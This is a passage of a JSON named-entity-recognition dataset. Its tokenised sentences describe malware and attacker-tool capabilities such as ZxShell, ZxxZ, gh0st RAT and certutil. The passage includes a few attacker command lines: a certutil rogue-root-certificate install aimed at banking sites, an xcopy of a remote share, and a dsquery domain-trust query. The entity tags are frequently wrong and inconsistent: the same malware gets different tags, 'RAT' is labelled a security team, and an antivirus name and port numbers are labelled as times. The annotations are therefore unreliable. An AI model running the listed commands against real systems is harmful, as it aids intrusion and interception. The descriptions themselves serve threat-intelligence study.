"O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "queries", "the", "system's", "keyboard", "mapping", "to", "determine", "the", "language", "used", "on", "the", "system.", "It", "will", "terminate", "execution", "if", "it", "detects", "LANG_RUSSIAN,", "LANG_BELARUSIAN,", "LANG_KAZAK,", "or", "LANG_UKRAINIAN." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "B-Way", "B-Way", "O", "B-Way" ] }, { "tokens": [ "Zeus", "Panda", "collects", "the", "current", "system", "time", "(UTC)", "and", "sends", "it", "back", "to", "the", "C2", "server." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "uses", "HTTP", "for", "C2", "communications." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "Zeus", "Panda", "can", "launch", "an", "interface", "where", "it", "can", "execute", "several", "commands", "on", "the", "victim’s", "PC." ], "ner_tags": [ "I-HackOrg", "I-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "has", "the", "ability", "to", "upload", "files", "from", "a", "targeted", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "has", "been", "encoded", "with", "Base64." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "has", "the", "ability", "to", "leverage", "local", "and", "remote", "exploits", "to", "escalate", "privileges." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "can", "enumerate", "files", "on", "a", "compromised", "host." ], "ner_tags": [ "B-Idus", "O", "B-SamFile", "B-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "can", "download", "files", "to", "a", "compromised", "machine." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "has", "the", "ability", "to", "list", "processes." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "O" ] }, { "tokens": [ "Zox", "has", "the", "ability", "to", "use", "SMB", "for", "communication." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O" ] }, { "tokens": [ "Zox", "has", "used", "the", ".PNG", "file", "format", "for", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "Zox", "can", "enumerate", "attached", "drives." ], "ner_tags": [ "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "command", "to", "clear", "system", "event", "logs." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "command", "called", "RunAs,", "which", "creates", "a", "new", "process", "as", "another", "user", "or", "process", "context." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "hooks", "several", "API", "functions", "to", "spawn", "system", "threads." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "transfer", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "disable", "the", "firewall", "by", "modifying", "the", "registry", "key", "<code>HKLM\\SYSTEM\\CurrentControlSet\\Services\\SharedAccess\\Parameters\\FirewallPolicy\\StandardProfile</code>." ], "ner_tags": [ "B-SamFile", "O", "B-Purp", "I-Features", "B-HackOrg", "O", "B-Way", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ZxShell", "can", "kill", "AV", "products'", "processes." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "is", "injected", "into", "a", "shared", "SVCHOST", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "feature", "to", "perform", "SYN", "flood", "attack", "on", "a", "host." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "B-Org", "I-OffAct", "I-OffAct", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "been", "dropped", "through", "exploitation", "of", "CVE-2011-2462,", "CVE-2013-3163,", "and", "CVE-2014-0322." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "B-Features", "B-Features", "O", "B-Features" ] }, { "tokens": [ "ZxShell", "can", "delete", "files", "from", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "used", "FTP", "for", "C2", "connections." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "command", "to", "open", "a", "file", "manager", "and", "explorer", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "command", "to", "transfer", "files", "from", "a", "remote", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "feature", "to", "capture", "a", "remote", "computer's", "keystrokes", "using", "a", "keylogger." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ZxShell", "has", "a", "feature", "to", "create", "local", "user", "accounts." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ZxShell", "can", "create", "Registry", "entries", "to", "enable", "services", "to", "run." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "leverage", "native", "API", "including", "<code>RegisterServiceCtrlHandler", "</code>", "to", "register", "a", "service.RegisterServiceCtrlHandler" ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "ZxShell", "can", "launch", "port", "scans." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "use", "ports", "1985", "and", "1986", "in", "HTTP/S", "communication." ], "ner_tags": [ "B-Way", "O", "O", "O", "B-Time", "O", "B-Time", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "command,", "ps,", "to", "obtain", "a", "listing", "of", "processes", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "set", "up", "an", "HTTP", "or", "SOCKS", "proxy." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "ZxShell", "can", "query", "the", "netsvc", "group", "value", "data", "located", "in", "the", "svchost", "group", "Registry", "key." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "remote", "desktop", "functionality." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "used", "rundll32.exe", "to", "execute", "other", "DLLs", "and", "named", "pipes." ], "ner_tags": [ "B-Way", "O", "O", "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "capture", "screenshots." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg" ] }, { "tokens": [ "ZxShell", "can", "create", "a", "new", "service", "for", "execution." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "B-Features", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "collect", "the", "local", "hostname,", "operating", "system", "details,", "CPU", "speed,", "and", "total", "physical", "memory." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "B-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "collect", "the", "owner", "and", "organization", "information", "from", "the", "target", "workstation." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "check", "the", "services", "on", "the", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "supports", "functionality", "for", "VNC", "sessions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ZxShell", "has", "a", "command", "to", "perform", "video", "device", "spying." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "has", "used", "HTTP", "for", "C2", "connections." ], "ner_tags": [ "B-Way", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "launch", "a", "reverse", "command", "shell." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxShell", "can", "create", "a", "new", "service", "using", "the", "service", "parser", "function", "ProcessScCommand." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "can", "collect", "data", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "has", "used", "a", "XOR", "key", "to", "decrypt", "strings." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "has", "been", "encoded", "to", "avoid", "detection", "from", "static", "analysis", "tools." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "can", "download", "and", "execute", "additional", "files." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ZxxZ", "has", "relied", "on", "victims", "to", "open", "a", "malicious", "attachment", "delivered", "via", "email." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way" ] }, { "tokens": [ "ZxxZ", "has", "been", "disguised", "as", "a", "Windows", "security", "update", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "has", "used", "API", "functions", "such", "as", "`Process32First`,", "`Process32Next`,", "and", "`ShellExecuteA`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "B-SamFile", "B-SamFile", "O", "B-SamFile" ] }, { "tokens": [ "ZxxZ", "has", "created", "a", "snapshot", "of", "running", "processes", "using", "`CreateToolhelp32Snapshot`." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "can", "search", "the", "registry", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "B-Purp", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "has", "used", "scheduled", "tasks", "for", "persistence", "and", "execution." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "can", "search", "a", "compromised", "host", "to", "determine", "if", "it", "is", "running", "Windows", "Defender", "or", "Kasperky", "antivirus." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Time", "O" ] }, { "tokens": [ "ZxxZ", "has", "been", "distributed", "via", "spearphishing", "emails,", "usually", "containing", "a", "malicious", "RTF", "or", "Excel", "attachment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Way", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O" ] }, { "tokens": [ "ZxxZ", "has", "collected", "the", "host", "name", "and", "operating", "system", "product", "name", "from", "a", "compromised", "machine." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ZxxZ", "can", "collect", "the", "username", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "adbupd", "contains", "a", "copy", "of", "the", "OpenSSL", "library", "to", "encrypt", "C2", "traffic." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "B-Features", "B-HackOrg", "O" ] }, { "tokens": [ "adbupd", "can", "run", "a", "copy", "of", "cmd.exe." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-SamFile" ] }, { "tokens": [ "adbupd", "can", "use", "a", "WMI", "script", "to", "achieve", "persistence." ], "ner_tags": [ "B-Idus", "O", "O", "O", "B-Way", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "at", "can", "be", "used", "to", "schedule", "a", "task", "on", "a", "system", "to", "be", "executed", "at", "a", "specific", "date", "or", "time." ], "ner_tags": [ "O", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "build_downer", "has", "the", "ability", "to", "download", "files", "from", "C2", "to", "the", "infected", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "build_downer", "has", "added", "itself", "to", "the", "Registry", "Run", "key", "as", "\"NVIDIA\"", "to", "appear", "legitimate." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "build_downer", "has", "the", "ability", "to", "use", "the", "<code>WinExec</code>", "API", "to", "execute", "malware", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Way", "O", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "build_downer", "has", "the", "ability", "to", "add", "itself", "to", "the", "Registry", "Run", "key", "for", "persistence." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "build_downer", "has", "the", "ability", "to", "detect", "if", "the", "infected", "host", "is", "running", "an", "anti-virus", "process." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "build_downer", "can", "extract", "malware", "from", "a", "downloaded", "JPEG." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "build_downer", "has", "the", "ability", "to", "send", "system", "volume", "information", "to", "C2." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "I-Features", "O", "O" ] }, { "tokens": [ "build_downer", "has", "the", "ability", "to", "determine", "the", "local", "time", "to", "ensure", "malware", "installation", "only", "happens", "during", "the", "hours", "that", "the", "infected", "system", "is", "active." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "has", "used", "`xcopy", "\\\\<target_host>\\c$\\users\\public\\path.7z", "c:\\users\\public\\bin\\<target_host>.7z", "/H", "/Y`", "to", "archive", "collected", "files." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "be", "used", "to", "automatically", "collect", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "collect", "files", "from", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "upload", "collected", "data", "and", "files", "to", "an", "FTP", "server." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "delete", "files", "and", "folders", "from", "compromised", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "parse", "collected", "files", "to", "identify", "specific", "file", "extensions." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "B-Features", "O", "O", "O" ] }, { "tokens": [ "ccf32", "has", "created", "a", "hidden", "directory", "on", "targeted", "systems,", "naming", "it", "after", "the", "current", "local", "time", "(year,", "month,", "and", "day)." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "temporarily", "store", "files", "in", "a", "hidden", "directory", "on", "the", "local", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "has", "copied", "files", "to", "a", "remote", "machine", "infected", "with", "Chinoxy", "or", "another", "backdoor." ], "ner_tags": [ "B-SamFile", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "run", "on", "a", "daily", "basis", "using", "a", "scheduled", "task." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "can", "determine", "the", "local", "time", "on", "targeted", "machines." ], "ner_tags": [ "B-SamFile", "O", "B-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ccf32", "has", "used", "`cmd.exe`", "for", "archiving", "data", "and", "deleting", "files." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "B-Features", "I-Features", "O", "B-Features", "O" ] }, { "tokens": [ "certutil", "may", "be", "used", "to", "Base64", "encode", "collected", "data." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "certutil", "has", "been", "used", "to", "decode", "binaries", "hidden", "inside", "certificate", "files", "as", "Base64", "information." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "certutil", "can", "be", "used", "to", "download", "files", "from", "a", "given", "URL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "certutil", "can", "be", "used", "to", "install", "browser", "root", "certificates", "as", "a", "precursor", "to", "performing", "Adversary-in-the-Middle", "between", "connections", "to", "banking", "websites.", "Example", "command:", "<code>certutil", "-addstore", "-f", "-user", "ROOT", "ProgramData\\cert512121.der</code>." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "O", "O", "O", "O", "B-Idus", "O", "O", "O", "B-SamFile", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "can", "be", "used", "to", "delete", "files", "from", "the", "file", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "can", "be", "used", "to", "find", "files", "and", "directories", "with", "native", "functionality", "such", "as", "<code>dir</code>", "commands." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "cmd", "can", "be", "used", "to", "copy", "files", "to/from", "a", "remotely", "connected", "external", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "can", "be", "used", "to", "copy", "files", "to/from", "a", "remotely", "connected", "internal", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "can", "be", "used", "to", "find", "information", "about", "the", "operating", "system." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "cmd", "is", "used", "to", "execute", "programs", "and", "other", "actions", "at", "the", "command-line", "interface." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "list", "the", "directories", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "B-HackOrg", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "download", "files", "to", "the", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "list", "running", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "detect", "anti-virus", "products", "and", "processes", "on", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "gather", "information", "on", "installed", "applications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "base64", "encode", "C2", "communications." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "O", "B-Idus" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "AES", "encrypt", "C2", "communications." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Way", "O", "B-Way", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "identify", "the", "system", "volume", "information", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "identify", "the", "MAC", "address", "of", "a", "compromised", "host." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "B-Features", "O", "O", "O", "O", "O" ] }, { "tokens": [ "down_new", "has", "the", "ability", "to", "use", "HTTP", "in", "C2", "communications." ], "ner_tags": [ "B-Idus", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "dsquery", "can", "be", "used", "to", "gather", "information", "on", "user", "accounts", "within", "a", "domain." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "dsquery", "can", "be", "used", "to", "gather", "information", "on", "permission", "groups", "within", "a", "domain." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "dsquery", "can", "be", "used", "to", "gather", "information", "on", "domain", "trusts", "with", "<code>dsquery", "*", "-filter", "\"(objectClass=trustedDomain)\"", "-attr", "*</code>." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "B-SamFile", "O" ] }, { "tokens": [ "dsquery", "has", "the", "ability", "to", "enumerate", "various", "information,", "such", "as", "the", "operating", "system", "and", "host", "name,", "for", "systems", "within", "a", "domain." ], "ner_tags": [ "B-Way", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "esentutl", "can", "be", "used", "to", "collect", "data", "from", "local", "file", "systems." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "esentutl", "can", "use", "the", "Volume", "Shadow", "Copy", "service", "to", "copy", "locked", "files", "such", "as", "`ntds.dit`." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "I-Features", "I-Features", "I-Features", "O", "O", "B-SamFile" ] }, { "tokens": [ "esentutl", "can", "be", "used", "to", "copy", "files", "from", "a", "given", "URL." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "esentutl", "can", "be", "used", "to", "copy", "files", "to/from", "a", "remote", "share." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "esentutl", "can", "copy", "`ntds.dit`", "using", "the", "Volume", "Shadow", "Copy", "service." ], "ner_tags": [ "B-SamFile", "O", "O", "B-SamFile", "O", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "esentutl", "can", "be", "used", "to", "read", "and", "write", "alternate", "data", "streams." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "O", "I-Features", "I-Features", "I-Features", "O" ] }, { "tokens": [ "ftp", "may", "be", "used", "to", "exfiltrate", "data", "separate", "from", "the", "main", "command", "and", "control", "protocol." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "B-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ftp", "may", "be", "abused", "by", "adversaries", "to", "transfer", "tools", "or", "files", "from", "an", "external", "system", "into", "a", "compromised", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "ftp", "may", "be", "abused", "by", "adversaries", "to", "transfer", "tools", "or", "files", "between", "systems", "within", "a", "compromised", "environment." ], "ner_tags": [ "B-SamFile", "O", "O", "O", "O", "O", "O", "I-Features", "I-Features", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "is", "able", "to", "wipe", "event", "logs." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "I-Features", "I-Features", "O" ] }, { "tokens": [ "gh0st", "RAT", "is", "able", "to", "open", "a", "remote", "shell", "to", "execute", "commands." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "A", "gh0st", "RAT", "variant", "has", "used", "DLL", "side-loading." ], "ner_tags": [ "O", "B-SamFile", "B-SecTeam", "O", "O", "O", "B-Features", "B-HackOrg" ] }, { "tokens": [ "gh0st", "RAT", "has", "decrypted", "and", "loaded", "the", "gh0st", "RAT", "DLL", "into", "memory,", "once", "the", "initial", "dropper", "executable", "is", "launched." ], "ner_tags": [ "B-Idus", "B-SecTeam", "O", "O", "O", "O", "O", "B-Way", "B-SecTeam", "O", "O", "O", "O", "O", "O", "B-Way", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "encrypted", "TCP", "communications", "to", "evade", "detection." ], "ner_tags": [ "B-Idus", "B-Tool", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "operators", "have", "used", "dynamic", "DNS", "to", "mask", "the", "true", "location", "of", "their", "C2", "behind", "rapidly", "changing", "IP", "addresses." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "I-Tool", "I-Tool", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "the", "capability", "to", "to", "delete", "files." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "O", "O", "O", "B-Features", "O" ] }, { "tokens": [ "gh0st", "RAT", "can", "download", "files", "to", "the", "victim’s", "machine." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "I-Features", "I-Features", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "a", "keylogger." ], "ner_tags": [ "B-SamFile", "B-SecTeam", "O", "O", "B-Way" ] }, { "tokens": [ "gh0st", "RAT", "has", "altered", "the", "InstallTime", "subkey." ], "ner_tags": [ "B-Way", "B-Tool", "O", "O", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "used", "the", "`InterlockedExchange`,", "`SeShutdownPrivilege`,", "and", "`ExitWindowsEx`", "Windows", "API", "functions." ], "ner_tags": [ "B-Idus", "B-HackOrg", "O", "O", "O", "O", "B-Tool", "O", "B-Tool", "O", "O", "O" ] }, { "tokens": [ "gh0st", "RAT", "has", "used", "an", "encrypted", "protocol", "within", "TCP", "segments", "to", "communicate", "with", "the", "C2." ], "ner_tags": [ "B-Idus", 